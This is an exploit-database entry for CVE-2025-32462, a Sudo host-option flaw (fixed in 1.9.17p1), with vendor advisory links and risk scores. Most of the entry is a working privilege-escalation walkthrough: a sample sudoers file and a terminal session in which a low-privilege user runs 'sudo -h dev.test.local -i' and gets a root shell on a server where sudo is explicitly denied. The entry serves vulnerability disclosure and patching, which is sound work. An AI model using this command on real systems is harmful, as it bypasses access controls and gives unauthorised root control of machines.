Vulners
Lucene search
Sudo 1.9.17 Host Option - Elevation of Privilege
10
# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
# Date: 2025-06-30
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.sudo.ws
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
# Fixed in: 1.9.17p1
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
# Blog:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo
1.9.13p2
# CVE : CVE-2025-32462
#
No exploit is required. Executing a sudo or sudoedit command with the host
option referencing an unrelated remote host rule causes Sudo to treat the
rule as valid for the local system. As a result, any command allowed by the
remote host rule can be executed on the local machine.
Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
is allowed to execute all commands (full root) on dev.test.local,
ci.test.local, but not prod.test.local.
Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local
lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL
Even though the prod.test.local server is explicitly denied for the lowpriv
user, root access is achieved by specifying the host option for the
dev.test.local or ci.test.local servers.
Example
Show that lowpriv is not allowed to execute sudo on the prod server.
lowpriv@prod:~$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
List the host rules for the dev.test.local server.
lowpriv@prod:~$ sudo -l -h dev.test.local
Matching Defaults entries for lowpriv on dev:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User lowpriv may run the following commands on dev:
(root) NOPASSWD: ALL
Execute a root shell on prod.test.local by specifying the -h dev.test.local
option.
lowpriv@prod:~$ sudo -h dev.test.local -i
sudo: a remote host may only be specified when listing privileges.
root@prod:~# id
uid=0(root) gid=0(root) groups=0(root)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2025 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.12.8 - 8.8
EPSS0.30014
SSVC